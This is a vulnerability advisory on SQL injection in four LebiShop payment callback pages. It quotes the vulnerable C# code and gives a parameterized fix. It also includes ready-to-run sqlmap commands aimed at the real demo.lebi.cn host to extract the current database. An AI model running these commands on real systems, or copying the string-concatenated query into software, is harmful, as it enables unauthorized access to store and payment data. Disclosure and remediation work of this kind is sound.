### Brief description:
SQL injection in four places in the latest version of the LebiShop e-commerce system; tested successfully on the demo site.
### Details:
Injections one and two: the main vulnerable code is the same.
```
http://demo.lebi.cn/onlinepay/95epay/PayNotify.aspx
http://demo.lebi.cn/onlinepay/95epay/PayResult.aspx
```
The shared source code is as follows:
```
protected void Page_Load(object sender, EventArgs e)
{
    this.MerNo = HttpContext.Current.Request.Params["MerNo"].ToString();
    this.BillNo = HttpContext.Current.Request.Params["BillNo"].ToString(); // not sanitized
    this.Amount = HttpContext.Current.Request.Params["Amount"].ToString();
    this.Succeed = HttpContext.Current.Request.Params["Succeed"].ToString();
    this.Result = HttpContext.Current.Request.Params["Result"].ToString();
    this.MD5info = HttpContext.Current.Request.Params["MD5info"].ToString();
    this.MerRemark = HttpContext.Current.Request.Params["MerRemark"].ToString();
    Lebi_OnlinePay onlinePay = Money.GetOnlinePay(this.BillNo); // follow this call
    if (onlinePay == null)
    {
        base.Response.Write("系统错误");
        base.Response.End();
    }
.....
public static Lebi_OnlinePay GetOnlinePay(string code)
{
    return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'")); // injection here
}
```
Injection three
```
http://demo.lebi.cn/onlinepay/kuaiqian/receive.aspx
```
Source code is as follows:
```
protected void Page_Load(object sender, EventArgs E)
{
    Lebi_OnlinePay onlinePay = Money.GetOnlinePay(base.Request["orderId"].ToString().Trim()); // follow this call
    if (onlinePay == null)
    {
        base.Response.Write("系统错误");
        base.Response.End();
    }
....
public static Lebi_OnlinePay GetOnlinePay(string code)
{
    return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'")); // not sanitized; same injection
}
```
Injection four
```
http://demo.lebi.cn/onlinepay/Paypal/ReturnUrl.aspx
```
Source code is as follows:
```
protected void Page_Load(object sender, EventArgs e)
{
    try
    {
        string str = base.Request.Form["txn_id"].ToString();
        string str2 = base.Request.Form["payment_status"].ToString();
        string str3 = base.Request.Form["payment_date"].ToString();
        string str4 = base.Request.Form["item_name"].ToString();
        string str5 = base.Request.Form["mc_gross"].ToString();
        string code = base.Request.Form["item_number"].ToString(); // not sanitized
        Lebi_OnlinePay onlinePay = Money.GetOnlinePay(code); // follow this call
        if (onlinePay == null)
        {
            base.Response.Write("系统错误");
            base.Response.End();
        }
        else
        {
            B_Lebi_Currency.GetModel(onlinePay.Currency_id);
            string str7 = "";
            str7 = str7 + "txn_id:" + str + "\n"
                 + "payment_status:" + str2 + "\n"
                 + "payment_date:" + str3 + "\n"
                 + "item_name:" + str4 + "\n"
                 + "mc_gross:" + str5 + "\n"
                 + "ppitem_number:" + code + "\n";
            if (this.VerifyIPN())
            {
                Order.OnlinePaySuccess(code, "", true);
            }
        }
    }
    catch (Exception)
    {
    }
}
public static Lebi_OnlinePay GetOnlinePay(string code)
{
    return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'")); // injection here
}
```
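In all four cases the root cause is the same: `GetOnlinePay` builds the `WHERE` clause by string concatenation, so a single quote in the order code ends the literal and the rest of the value is parsed as SQL. As an added illustration (not LebiShop's own code), the vulnerable shape beside a parameterized lookup; the table name `Lebi_Order`, the 50-character column width, the order-code alphabet and the connection string are assumptions.

```csharp
// Added example, not code from LebiShop. Table name, column width and the
// accepted order-code alphabet are assumptions made for illustration.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

public static class OrderLookup
{
    // Vulnerable shape, as in Money.GetOnlinePay: the request value becomes
    // part of the SQL text, so a quote in it changes the query's structure.
    public static string BuildVulnerableWhere(string code)
    {
        return "Code='" + code + "'";
    }

    // Hardened lookup: the value travels as a typed parameter and is never
    // parsed as SQL, whatever characters it contains.
    public static DataRow GetOrderByCode(string connectionString, string code)
    {
        if (string.IsNullOrEmpty(code) || code.Length > 50)
            throw new ArgumentException("invalid order code");

        // Assumed alphabet for order codes. The format check is defence in
        // depth only; the parameter below is what actually prevents injection.
        if (!Regex.IsMatch(code, @"^[A-Za-z0-9_-]+$"))
            throw new ArgumentException("invalid order code");

        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(
            "SELECT TOP 1 * FROM Lebi_Order WHERE Code = @code", conn))
        {
            cmd.Parameters.Add("@code", SqlDbType.NVarChar, 50).Value = code;
            conn.Open();
            var table = new DataTable();
            using (var reader = cmd.ExecuteReader())
            {
                table.Load(reader);
            }
            return table.Rows.Count == 0 ? null : table.Rows[0];
        }
    }
}
```

Applying the same change inside `B_Lebi_Order.GetModel` (or giving it a parameterized overload) fixes all four entry points at once, since each of them only differs in which request field reaches `GetOnlinePay`.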
### Proof of vulnerability:
Injections one and two
sqlmap scan
```
sqlmap -u "http://demo.lebi.cn/onlinepay/95epay/PayNotify.aspx" --data "MerNo=1&Amount=1&Succeed=1&Result=1&MD5info=1&MerRemark=1&BillNo=1" -p "BillNo" --dbms "mssql" --current-db --technique=T --time-sec 10
```
![541.png](https://images.seebug.org/upload/201503/031003269a475b49a41325daadffd8eee3514edc.png)
![542.png](https://images.seebug.org/upload/201503/03100337b238b47389f4e5ea8233d8c79a33e32c.png)
Injection three
sqlmap scan
```
sqlmap -u "http://demo.lebi.cn/onlinepay/kuaiqian/receive.aspx" --data "orderId=1" -p "orderId" --dbms "mssql" --current-db --technique=T --time-sec 10
```
![543.png](https://images.seebug.org/upload/201503/031006285d2505e095b5423c57f1f1342f148fe4.png)
![544.png](https://images.seebug.org/upload/201503/03101507f81cdfd7091af532ac2e4b3c902cfb4e.png)
Injection four
sqlmap scan
```
sqlmap -u "http://demo.lebi.cn/onlinepay/Paypal/ReturnUrl.aspx" --data "txn_id=1&payment_status=1&payment_date=1&item_name=1&mc_gross=1&item_number=1" -p "item_number" --dbms "mssql" --current-db --technique=T --time-sec 10
```
![545.png](https://images.seebug.org/upload/201503/03101639117d1217db1425175e9c51767ffcaaa4.png)
![546.png](https://images.seebug.org/upload/201503/031019453bfa057f2fc15bcfec7aa977c5fdd38b.png)